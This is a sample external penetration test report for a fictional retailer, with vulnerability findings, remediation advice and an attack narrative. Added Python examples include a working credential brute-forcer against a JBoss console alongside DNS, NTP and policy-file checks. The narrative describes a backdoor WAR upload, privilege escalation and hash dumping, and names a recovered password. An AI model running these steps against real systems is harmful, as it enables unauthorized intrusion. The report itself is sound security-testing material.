External Network Penetration Test Report
Jared Doe
Document Information
Assessment Information
Assessor: Kirit Gupta, [email protected], (888) 944-8679
Client: Acme Company, www.acmecompany.com, 123-456-7890
Project Manager: Benjamin Caudill, [email protected], (888) 944-8679
Client Contact: Jared Doe, [email protected]
Assessment Type: External Network Penetration Test
Project Number: ACM-NPT-10162015
Report Date: 10-16-2015
Assessment Period: 10-14-2015 - 10-14-2015
Revision History
Version Date Author Notes
1. Executive Summary
Rhino Security Labs conducted a network penetration test for Acme Company (Acme). This test was performed to assess Acme's defensive posture and provide security assistance by proactively identifying vulnerabilities, validating their severity, and providing remediation steps.
Rhino Security Labs reviewed the security of Acme Company's infrastructure and has determined a CRITICAL risk of compromise from external attackers, as shown by the presence of multiple serious vulnerabilities.
The detailed findings and remediation recommendations for these assessments may be found later in the report.
Strategic Recommendations
Not all security weaknesses are technical in nature, nor can they all be remediated by security personnel. Companies often have to focus on the root security issues and resolve them at their core. These strategic steps are changes to the operational policy of the organization. Rhino Security Labs recommends the following strategic steps for improving the company's security.
1 Enforce a more secure password policy, and educate users on proper password management.
2 Upgrade all Windows 2003 Servers to 2008 or above.
3 Transition company architecture from cleartext protocols to encrypted versions.
4 Enhance security defenses with additional detection and response capabilities, such as a SIEM.
2. Summary Vulnerability Overview
testing and validation follows to simulate real-world attack scenarios. The following vulnerabilities were determined to be of highest risk, based on several factors including asset criticality, threat likelihood, and vulnerability severity.
Summary
An external network penetration test was performed on Acme Company. The following vulnerabilities were found, indicating that the overall risk rating of this environment is Critical.
ID | Vulnerability | Risk | Remediation
C1 | Subdomain Takeover Vulnerability | Critical | Remove the unused CNAME record that still points to the abandoned community site.
C2 | JBoss Credentials Brute Forced | Critical | Increase the administrative password complexity, or remove the administrative account if possible.
H1 | Sensitive Public Information Identified | High | Remove sensitive information on the company from public resources.
H2 | Nameserver Processes Recursive Queries | High | Restrict the processing of recursive queries.
H3 | Multiple Unpatched Apache Vulnerabilities | High | Update all Apache services and associated modules.
H4 | Multiple Unpatched PHP Vulnerabilities | High | Update all PHP services and associated modules.
H5 | Multiple Unpatched OpenSSH Vulnerabilities | High | Regularly patch and update all OpenSSH services.
H6 | Public Telnet Service | High | Disable telnet and replace it with SSH.
M1 | NTP Clock Variables Information Disclosure | Medium | Remove NTP from the given systems or apply an ACL that restricts NTP readvar queries from unauthorized clients.
M2 | Adobe Flash Permissive crossdomain.xml Policy | Medium | Edit the crossdomain.xml file, ensuring permissions are restricted to only what's necessary.
L1 | TCP Sequence Number Approximation Vulnerability | Low | On Windows systems, install the necessary patches for the given version of Windows. On Linux systems, enable TCP MD5 signatures.
L2 | Web Directory is Publicly Browsable | Low | In the httpd.conf file, disable the Indexes option for the appropriate <Directory> tag by removing it from the Options line.
3. Process and Methodology
Rhino Security Labs used a proprietary methodology to accurately assess the security of Acme Company’s networks. This process involves detailed reconnaissance and research into the architecture and environment, performing automated testing for known vulnerabilities, and manually exploiting vulnerabilities for the purpose of detecting security weaknesses in the enterprise.
Reconnaissance
services they are running. Research into these services is then carried out to tailor the test to the discovered systems.
Automated Testing
Rhino Security Labs used a vulnerability scanner to conduct an automated analysis of Acme Company’s network. This scan provides the foundation for the full manual assessment, and its output should be read together with this detailed report to gain an accurate representation of Acme Company’s security posture.
Manual Exploitation and Verification
Rhino Security’s consultants use the results of the vulnerability scan, paired with their expert knowledge and experience, to conduct a manual security analysis of the network. The assessors attempt to obtain access to sensitive systems via published exploits or the weaknesses discovered. The detailed results of both the vulnerability scan and the manual testing are shown in the tables below.
4. Constraints
The following limitations were placed upon this engagement, as agreed upon with Acme Company:
Vulnerabilities which would cause outages or interrupt the client's environment were noted but not validated.
Penetration testing was limited to the agreed upon time period, scope, and other additional boundaries set in the contract and service agreement.
5. Research
Penetration Testing Notes
Assessment Information
Assessment Type: External Black-box
Vulnerability Scanner: Rapid7 NeXpose / Proprietary Internal Tools
VPN Utilized: None
Number of IPs in scope: 9
6. Vulnerability Findings
The vulnerabilities below were identified and verified by Rhino Security Labs during the process of this network penetration test for Acme Company. Retesting should be planned following the remediation of these vulnerabilities.
Attack Narrative
Rhino Security Labs was tasked with performing an external penetration test for Acme Company Industries, an online retailer specializing in the sale of eye care products.
This assessment is part of a larger engagement, involving a web application penetration test, social engineering, and an internal penetration test.
The consultant assigned to this test began by performing routine reconnaissance and information gathering on the company, mining any useful data which can be used later in the assessment. After a thorough sweep of company websites, document metadata, social media sites and other resources, a cache of sensitive information was identified, including:
Internal LDAP Username Syntax – Multiple names and internal LDAP usernames were found in PDF metadata from the corporate website. This is useful because it provides the syntax needed to derive LDAP usernames from employee names, which are often easy to find.
Corporate Email Syntax – Like many organizations, the company's email address format was found online in multiple locations.
Employee Names – Over 120 Acme employees were found on LinkedIn and through other public sources, many of whom are high-value personnel within the company (IT staff, company executives, etc.). Combined with the syntax above, usernames and email addresses could be created for each user, which is useful for brute forcing and similar network attacks.
Using this information, the tester was also able to confirm that a key security staff member was on vacation and that response times would be slower, which is useful to know during an engagement.
DNS enumeration and brute forcing was also performed on the domain, identifying a total of 46 subdomains. While many of these subdomains pointed to servers not in scope and should have additional security auditing performed on them (such as “dev”, “transfer” and “shop-dev”), one subdomain (community.acme.com) provided an interesting target. This subdomain pointed to a hosted community site which was no longer being used by Acme and whose name could therefore be registered on the hosting site by anyone, essentially hijacking a legitimate company subdomain.
With initial information gathering activities completed, port and service scanning of Acme Company’s external systems began. The tester encountered telnet and other unencrypted protocols that could be potential threats to the company’s online security. During the tester’s examination of the ports, port 8080 was identified as open on one system and confirmed as an old JBoss version (4.0.4), hosting Java web applications for Acme Company’s online store.
After further enumeration of the system, the tester confirmed that the JMX Console (the administrative console for JBoss) required a password. The username list assembled during reconnaissance was then used in a highly targeted brute-force attack against the console, and a valid username and password were confirmed: MAnthony / acmedev1. Rhino Security consultants gained access to the administrative console and began exploitation.
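The two steps above, building a username list from public names using the discovered syntax and then running a targeted credential guess against an HTTP Basic-auth protected console, written out as an added example. This is not code from the original report or from Rhino Security Labs; the employee names, the target URL (jboss.example.test) and the password list are constructed for illustration, and the `attempt` callable is injected so the guessing logic can be exercised without a live target.

```python
"""Added example, not from the original report: derive candidate usernames
from public employee names using the observed internal syntax, then run a
targeted HTTP Basic-auth guess against an administrative console such as the
JBoss JMX Console. Employee names, the target URL and the password list are
constructed for illustration."""
import base64
import itertools
import urllib.error
import urllib.request
from typing import Callable, Iterable, List, Optional, Tuple

# Username templates. The account recovered in the narrative ("MAnthony")
# follows the first-initial + surname form, so that pattern is tried first.
PATTERNS = ("{f}{last}", "{first}.{last}", "{first}{l}", "{last}{f}", "{first}")


def generate_usernames(names: Iterable[str], patterns=PATTERNS) -> List[str]:
    """Expand 'First Last' names into de-duplicated candidates, keeping the
    most likely pattern first so a capped run spends its budget well."""
    seen, out = set(), []
    for name in names:
        parts = name.split()
        if len(parts) < 2:
            continue
        first, last = parts[0], parts[-1]
        for pat in patterns:
            cand = pat.format(f=first[0], l=last[0], first=first, last=last)
            if cand.lower() not in seen:
                seen.add(cand.lower())
                out.append(cand)
    return out


def brute_force(users: Iterable[str], passwords: Iterable[str],
                attempt: Callable[[str, str], bool],
                max_attempts: Optional[int] = None) -> Optional[Tuple[str, str]]:
    """Try every (user, password) pair via `attempt` (True on success). Returns
    the first valid pair, or None. `max_attempts` keeps a run inside the
    lockout budget agreed with the client."""
    for n, (user, password) in enumerate(itertools.product(list(users), list(passwords))):
        if max_attempts is not None and n >= max_attempts:
            break
        if attempt(user, password):
            return user, password
    return None


def http_basic_attempt(url: str, timeout: float = 5.0) -> Callable[[str, str], bool]:
    """Build an `attempt` callable for a resource behind HTTP Basic auth (the
    JBoss 4 JMX Console uses BASIC when its security constraint is enabled).
    A 401/403 means the guess failed; any 2xx means it worked."""
    def attempt(user: str, password: str) -> bool:
        token = base64.b64encode(f"{user}:{password}".encode()).decode()
        req = urllib.request.Request(url, headers={"Authorization": f"Basic {token}"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return 200 <= resp.status < 300
        except urllib.error.HTTPError as err:
            if err.code in (401, 403):
                return False
            raise
    return attempt


if __name__ == "__main__":
    # Constructed stand-in for the LinkedIn / PDF-metadata harvest.
    employees = ["Mark Anthony", "Jane Smith"]
    users = generate_usernames(employees)
    # Constructed target; the hostname is an assumption.
    attempt = http_basic_attempt("http://jboss.example.test:8080/jmx-console/")
    print(brute_force(users, ["acmedev1", "Password1"], attempt, max_attempts=50))
```

The pattern order matters more than the pattern count: once metadata has revealed the real syntax, a short list tried against many accounts is far less noisy than a large wordlist against one, and `max_attempts` is there because the client's lockout policy, not the wordlist, sets the budget.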
From here, the tester uploaded a malicious WAR file (a Java web application archive) through the console, creating a backdoor that provided initial access to the system, although with limited privileges.
Using this foothold, the tester quickly identified the operating system as Windows 2003, uploaded a local exploit, and escalated to system level privileges.
With these privileges, the tester was able to dump the local system hashes. After loading these hashes into Rhino Security Labs’ password cracking box, 95% were cracked within just a few hours, providing access to additional publicly accessible services.
External Network Details
Exploited Vulnerabilities
The vulnerabilities listed in the tables below were exploited by Rhino Security Labs during the course of the assessment. Evidence of the exploit is provided, along with recommended remediation steps to correct these vulnerabilities.
Subdomain Takeover Vulnerability
Report ID C1 Risk Critical
IP(s)
Exploitation Likelihood High Potential Impact Critical
Description
During the subdomain enumeration process, a CNAME record was found pointing to a hosted community site (ning.com) no longer being used. Since the DNS record is still in place, it can be purchased/registered on the community hosting site and seized by an unauthorized user.
Remediation Remove the affected CNAME record, which is no longer being used.
Testing Process
This issue was identified by first enumerating subdomains, which were then tied to specific DNS records and IP addresses. The given CNAME record was identified as pointing to a forum site which is no longer being utilized by the company.
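The check behind this finding, flagging CNAME records whose target no longer resolves or points into a third-party hosting namespace, as an added example that is not part of the original report. The record set, the lookup table used in place of live DNS, and the list of takeover-prone service suffixes are all constructed for illustration (ning.com is included because the affected record in this report pointed there).

```python
"""Added example, not from the original report: flag DNS names whose CNAME
points at a host that no longer resolves (a dangling record) or at a hosted
service where the target name could be registered by someone else. The
suffix list is an assumption for illustration."""
import socket
from typing import Callable, Dict, List, Optional, Tuple

# Hosted services on which an unclaimed name can be registered by a third
# party. Assumed list; extend it from the provider inventory for the client.
TAKEOVER_PRONE_SUFFIXES = ("ning.com", "github.io", "herokuapp.com")


def resolves(host: str) -> bool:
    """Live lookup: does the CNAME target have any address record?"""
    try:
        socket.getaddrinfo(host, None)
        return True
    except socket.gaierror:
        return False


def classify(cname: Optional[str], resolve: Callable[[str], bool] = resolves) -> str:
    """'ok' for no CNAME or a healthy in-house target; 'dangling' if the target
    does not resolve at all; 'review' if it resolves but lives on a third-party
    service, where ownership of the name must be confirmed with the client."""
    if not cname:
        return "ok"
    target = cname.rstrip(".").lower()
    if not resolve(target):
        return "dangling"
    if any(target == s or target.endswith("." + s) for s in TAKEOVER_PRONE_SUFFIXES):
        return "review"
    return "ok"


def audit(records: Dict[str, Optional[str]],
          resolve: Callable[[str], bool] = resolves) -> List[Tuple[str, str, str]]:
    """(name, cname, verdict) for every record that is not 'ok'."""
    findings = []
    for name, cname in records.items():
        verdict = classify(cname, resolve)
        if verdict != "ok":
            findings.append((name, cname or "", verdict))
    return findings


if __name__ == "__main__":
    # Constructed records standing in for the output of subdomain enumeration.
    sample = {
        "community.acme.example": "old-forum.ning.com.",
        "www.acme.example": "www.acmecompany.example.",
        "acme.example": None,
    }
    for finding in audit(sample):
        print(*finding)
```

A dangling target is exploitable only when an attacker can register the name the record points to, which is true of abandoned accounts on hosted services and of expired domains; confirming a finding means actually claiming the name on the provider, as the narrative describes, and then removing the CNAME rather than re-registering it indefinitely.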
JBoss Credentials Brute Forced
Report ID C2 Risk Critical
IP(s)
Description The administrative credentials for the JMX Console of a publicly facing JBoss server were brute-forced using a targeted wordlist. See the above narrative for the recovered account and further details.
Remediation Increase the administrative password complexity, remove the administrative account if possible, and remove public access to the JMX Console if possible.
Testing Process See the above narrative; manually tested.
Sensitive Public Information Identified
Report ID H1 Risk High
IP(s) N/A
Exploitation Likelihood High Potential Impact Critical
Description A number of major sources of sensitive information were publically identified, eventually being leveraged in a targeted brute-force against public resources.
Remediation Remove sensitive information on the company from public resources, including social media and the corporate website.
Testing Process
Notable Vulnerabilities
The following vulnerabilities were not exploited by Rhino Security Labs. However, they still represent a risk to ACME’s network security.
Nameserver Processes Recursive Queries
Report ID H2 Risk High
IP(s)
Exploitation Likelihood High Potential Impact High
Description
Allowing nameservers to process recursive queries coming from any system may, in certain situations, help attackers conduct denial of service or cache poisoning attacks.
Remediation Restrict the processing of recursive queries to only systems that should be allowed to use this nameserver.
Testing Process
NSE (Nmap Scripting Engine) was used to test for Recursive DNS queries with a given list of domains.
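The check the Nmap dns-recursion script performs, written out as an added example (not code from the original report or from the Nmap project): send a query with the RD flag set for a name the target is not authoritative for, and read the RA flag and response code from the reply. The sample replies used in the test are constructed byte strings; probe() does a live UDP query against a server you name.

```python
"""Added example, not from the original report: craft a recursion-desired DNS
query and decide from the reply whether the server performed recursion for
an arbitrary client."""
import random
import socket
import struct
from typing import Dict, Optional

QTYPE_A = 1
QCLASS_IN = 1


def build_query(name: str, qtype: int = QTYPE_A, txid: Optional[int] = None) -> bytes:
    """Standard query, one question, RD=1 (header flags 0x0100)."""
    if txid is None:
        txid = random.randrange(0, 0x10000)
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.rstrip(".").split("."))
    return header + qname + b"\x00" + struct.pack("!HH", qtype, QCLASS_IN)


def parse_header(resp: bytes) -> Dict[str, int]:
    """Pull the fields we need out of the 12-byte DNS header."""
    txid, flags, _qd, an, ns, _ar = struct.unpack("!HHHHHH", resp[:12])
    return {
        "id": txid,
        "qr": (flags >> 15) & 1,   # 1 = response
        "rd": (flags >> 8) & 1,    # recursion desired (echoed from the query)
        "ra": (flags >> 7) & 1,    # recursion available
        "rcode": flags & 0x0F,     # 0 NOERROR, 3 NXDOMAIN, 5 REFUSED
        "ancount": an,
        "nscount": ns,
    }


def is_open_recursive(resp: bytes, expected_id: int) -> bool:
    """True when the server both advertised recursion (RA) and performed it:
    NOERROR with answers, or an NXDOMAIN for a name it does not host.
    REFUSED, or a bare referral with RA clear, means recursion is restricted."""
    if len(resp) < 12:
        return False
    h = parse_header(resp)
    if h["id"] != expected_id or not h["qr"] or h["ra"] != 1:
        return False
    return (h["rcode"] == 0 and h["ancount"] > 0) or h["rcode"] == 3


def probe(server: str, name: str = "www.example.com", port: int = 53,
          timeout: float = 3.0) -> Optional[bool]:
    """Live check against one nameserver; None on timeout."""
    txid = random.randrange(0, 0x10000)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_query(name, txid=txid), (server, port))
        try:
            data, _ = sock.recvfrom(512)
        except socket.timeout:
            return None
    return is_open_recursive(data, txid)
```

Query a name outside every zone the target serves (example.com is a safe choice), otherwise an authoritative NXDOMAIN with RA set would look like recursion. A server that answers the question from cache but refuses new recursion will also pass this test, so repeat it with a name unlikely to be cached.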
Multiple Unpatched Apache Vulnerabilities
Report ID H3 Risk High
App(s)
Exploitation Likelihood High Potential Impact High
Remediation Update all Apache services and associated modules to the newest version available, and ensure appropriate patch management policies are in place.
Testing Process
Using a port scanner, ports 80 and 443 were tested to verify the Apache version and associated vulnerabilities.
Multiple Unpatched PHP Vulnerabilities
Report ID H4 Risk High
App(s)
Exploitation Likelihood High Potential Impact High
Description Multiple unpatched PHP vulnerabilities were found on the external network.
Remediation Update all PHP services and associated modules (such as Apache) to the newest version available, and ensure appropriate patch management policies are in place.
Testing Process
Using port scanners and version detection tools, the web server was tested for its version of Apache, which was correlated to a corresponding version of PHP. Because distribution-maintained packages frequently backport security fixes without changing the advertised version string, banner-based findings such as this one should be confirmed against the vendor's changelog, or by direct testing, before remediation is scheduled.
Multiple Unpatched OpenSSH Vulnerabilities
Report ID H5 Risk High
App(s)
Exploitation Likelihood High Potential Impact High
Remediation Ensure all OpenSSH servers remain up-to-date by regularly patching OpenSSH and associated modules.
Testing Process
A port scanner and version-detection tools were used to verify service versions and vulnerabilities.
Public Telnet Service
Report ID H6 Risk High
App(s)
Exploitation Likelihood High Potential Impact High
Description Public telnet services were found on the external network.
Remediation For command-line access, disable telnet and replace with SSH, which utilizes encrypted sessions.
Testing Process
Using a telnet client, port 23 was checked to verify telnet connectivity.
Minor Vulnerabilities
The following vulnerabilities are of lower risk to the environment
NTP Clock Variables Information Disclosure
Report ID M1 Risk Medium
App(s)
Exploitation Likelihood Medium
Potential Impact Critical
Description The NTP service answers mode 6 'readvar' control queries from any source, returning system variables that identify the NTP software version, operating system and processor architecture, which aids fingerprinting and the selection of further attacks.
Remediation Remove NTP from the given systems or apply an ACL that restricts NTP readvar queries from unauthorized clients (for ntpd, the restrict directive with the noquery flag).
Testing Process
NTP 'readvar' queries are sent to the given NTP server, which then respond with identifying information.
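The readvar query the testing process describes, crafted and parsed by hand, as an added example that is not code from the original report or from the NTP project. build_readvar() produces the same mode 6 control packet that `ntpq -c rv` sends; SAMPLE_PAYLOAD is a constructed reply body modelled on typical ntpd 4.2.x output, and probe() sends the real query to a server you name.

```python
"""Added example, not from the original report: craft an NTP mode 6 READVAR
control query and parse the variable list a responding server returns."""
import socket
import struct
from typing import Dict, List, Optional

# Control message header: LI/VN/Mode byte, R|E|M|opcode byte, sequence,
# status, association ID, offset, count (payload length).
_HDR = "!BBHHHHH"
_MODE_CONTROL = 6
_OP_READVAR = 2


def build_readvar(seq: int = 1, assoc_id: int = 0) -> bytes:
    """The equivalent of `ntpq -c rv`: VN=2, mode 6, opcode READVAR, no data."""
    first = (0 << 6) | (2 << 3) | _MODE_CONTROL      # LI=0, VN=2, Mode=6 -> 0x16
    return struct.pack(_HDR, first, _OP_READVAR, seq, 0, assoc_id, 0, 0)


def _split_items(text: str) -> List[str]:
    """Split on commas that are not inside double quotes."""
    items, cur, in_quotes = [], [], False
    for ch in text:
        if ch == '"':
            in_quotes = not in_quotes
        if ch == "," and not in_quotes:
            items.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    items.append("".join(cur))
    return items


def parse_control_response(data: bytes) -> Optional[Dict[str, str]]:
    """Return the key=value variables from a READVAR reply, or None if the
    packet is not a successful mode-6 response."""
    if len(data) < 12:
        return None
    first, second, _seq, _status, _assoc, _offset, count = struct.unpack(_HDR, data[:12])
    if (first & 0x07) != _MODE_CONTROL or not (second & 0x80):   # mode 6, response bit
        return None
    if second & 0x40:                                          # error bit set
        return None
    payload = data[12:12 + count].decode("ascii", errors="replace")
    variables: Dict[str, str] = {}
    for item in _split_items(payload):
        if "=" not in item:
            continue
        key, value = item.split("=", 1)
        variables[key.strip()] = value.strip().strip('"')
    return variables


DISCLOSURE_KEYS = ("version", "processor", "system", "refid", "stratum")


def disclosed(variables: Dict[str, str]) -> Dict[str, str]:
    """The fields an attacker cares about: software version and OS fingerprint."""
    return {k: variables[k] for k in DISCLOSURE_KEYS if k in variables}


def probe(server: str, port: int = 123, timeout: float = 3.0) -> Optional[Dict[str, str]]:
    """Live check; a reply with variables means readvar is exposed to this client."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_readvar(), (server, port))
        try:
            data, _ = sock.recvfrom(1024)
        except socket.timeout:
            return None
    return parse_control_response(data)


# Constructed sample reply body, modelled on what ntpd 4.2.x returns to `ntpq -c rv`.
SAMPLE_PAYLOAD = (b'version="ntpd 4.2.6p5@1.2349-o Fri Jul 22 17:30:51 UTC 2011 (1)",\r\n'
                  b'processor="x86_64", system="Linux/3.2.0-4-amd64", leap=0, stratum=3,\r\n'
                  b'precision=-22, rootdelay=25.771, refid=10.0.0.1')


def make_response(payload: bytes, seq: int = 1, error: bool = False) -> bytes:
    """Wrap `payload` in a mode-6 reply header (used for the offline sample)."""
    second = 0x80 | (0x40 if error else 0) | _OP_READVAR
    return struct.pack(_HDR, 0x16, second, seq, 0, 0, 0, len(payload)) + payload


if __name__ == "__main__":
    print(disclosed(parse_control_response(make_response(SAMPLE_PAYLOAD))))
```

A long variable list is split across several datagrams with the M (more) bit set; this example reads only the first, which already carries the version and system fields that matter for the finding. A server with a correct restrict policy either stays silent or returns a response with the error bit set, which parse_control_response reports as None.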
Adobe Flash permissive crossdomain.xml policy
Report ID M2 Risk Medium
App(s)
Exploitation Likelihood Medium
Potential Impact Medium
Description
Permissive crossdomain.xml policy files allow external Adobe Flash (SWF) scripts to interact with your website. Depending on how authorization is restricted on your website, this could inadvertently expose data to other domains or allow invocation of functionality across domains.
Remediation Edit the crossdomain.xml file, ensuring permissions are restricted to only what's necessary.
Testing Process
A web browser was used to fetch the policy file from the web root (/crossdomain.xml) and verify the following in the HTTP response: '...domain-policy><site-control permitted-cross-domain-policies="all"'
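An offline audit of a crossdomain.xml master policy, as an added example that is not code from the original report. The two policy documents are constructed: PERMISSIVE reproduces the condition observed in testing (permitted-cross-domain-policies="all") alongside the other over-broad grants a reviewer should look for, and RESTRICTED shows the corrected form the remediation calls for.

```python
"""Added example, not from the original report: check a crossdomain.xml
document for the grants that expose a site to arbitrary Flash origins."""
import xml.etree.ElementTree as ET
from typing import List

# Constructed: the weak policy, as a tester would see it in the HTTP response.
PERMISSIVE = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

# Constructed: the same policy restricted to what the site actually needs.
RESTRICTED = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="www.acmecompany.com" secure="true"/>
</cross-domain-policy>"""

# Meta-policy values that let policy files elsewhere on the host widen access.
LOOSE_META_POLICIES = ("all", "by-content-type", "by-ftp-filename")


def audit_crossdomain(xml_text: str) -> List[str]:
    """Return a list of findings; an empty list means nothing over-broad."""
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return ["root element is not <cross-domain-policy>"]
    issues: List[str] = []

    site_control = root.find("site-control")
    if site_control is not None:
        meta = site_control.get("permitted-cross-domain-policies", "")
        if meta in LOOSE_META_POLICIES:
            issues.append(f'site-control permitted-cross-domain-policies="{meta}" lets '
                          "non-master policy files (e.g. in user-writable paths) grant access")

    for el in root.findall("allow-access-from"):
        domain = el.get("domain", "")
        if domain == "*":
            issues.append('allow-access-from domain="*" grants every origin')
        elif domain.startswith("*."):
            issues.append(f'allow-access-from domain="{domain}" grants every subdomain')
        if el.get("secure", "true").lower() == "false":
            issues.append(f'allow-access-from domain="{domain}" secure="false" lets http:// '
                          "SWFs reach this https:// site")

    for el in root.findall("allow-http-request-headers-from"):
        if el.get("domain") == "*":
            headers = el.get("headers", "")
            issues.append('allow-http-request-headers-from domain="*" lets any origin send '
                          f'headers "{headers}"')
    return issues


if __name__ == "__main__":
    for label, policy in (("permissive", PERMISSIVE), ("restricted", RESTRICTED)):
        print(label, audit_crossdomain(policy) or "OK")
```

The meta-policy line is the one most often overlooked: with "all", any policy file an attacker can place on the host (an upload directory, for instance) is honoured by the Flash runtime, so fixing the allow-access-from entries alone is not enough.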
TCP Sequence Number Approximation Vulnerability
Report ID L1 Risk Low
App(s)
Exploitation Likelihood Low
Description Certain conditions make it easier for remote attackers to cause denial-of-service (DoS) against local users by injecting TCP RST packets and ending current sessions.
Remediation
On Windows systems, install the necessary patches for the given version of Windows. On Linux systems, enable TCP MD5 signatures to prevent this type of TCP injection attack. Note that TCP MD5 signatures (RFC 2385) are configured per connection and are practical mainly for long-lived sessions such as BGP; for general-purpose Linux hosts the effective mitigation is a kernel implementing the RFC 5961 in-window checks for RST and SYN segments.
Testing Process
Vulnerability was found using a vulnerability scanner. Explicit testing against this vulnerability was not performed due to the results of the attack (Denial of Service).
Web Directory is Publicly Browsable
Report ID L2 Risk Low
App(s)
Exploitation Likelihood Medium
Potential Impact Low
Description A web directory was found to be browsable, which means that anyone can see the entire contents of the web directory.
Remediation In the httpd.conf file, disable the Indexes option for the appropriate <Directory> tag by removing it from the Options line.
Testing
Appendix A: Definitions and Criteria
The risk ratings assigned to each vulnerability are determined through averaging several aspects of the exploit and the environment, including reputation, difficulty, and criticality.
Risk Rating Definitions
CRITICAL
Critical vulnerabilities pose a very high threat to a company's data, and should be fixed on a top-priority basis. They can allow an attacker to completely compromise the environment or cause other serious impacts to the security of the application.
HIGH
High severity vulnerabilities should be considered a top priority in terms of mitigation. These are among the most severe issues and generally cause an immediate security concern to the enterprise.
MEDIUM
Medium severity vulnerabilities are a lower priority, but should still be remediated in a timely manner. These are moderate exploits that have less of an impact on the environment.
LOW
Low severity vulnerabilities are real but have trivial impact on the environment. These should only be remediated after the HIGH and MEDIUM vulnerabilities are resolved.
INFORMATIONAL
Informational vulnerabilities have no impact as such to the environment by themselves. However, they might provide an attacker with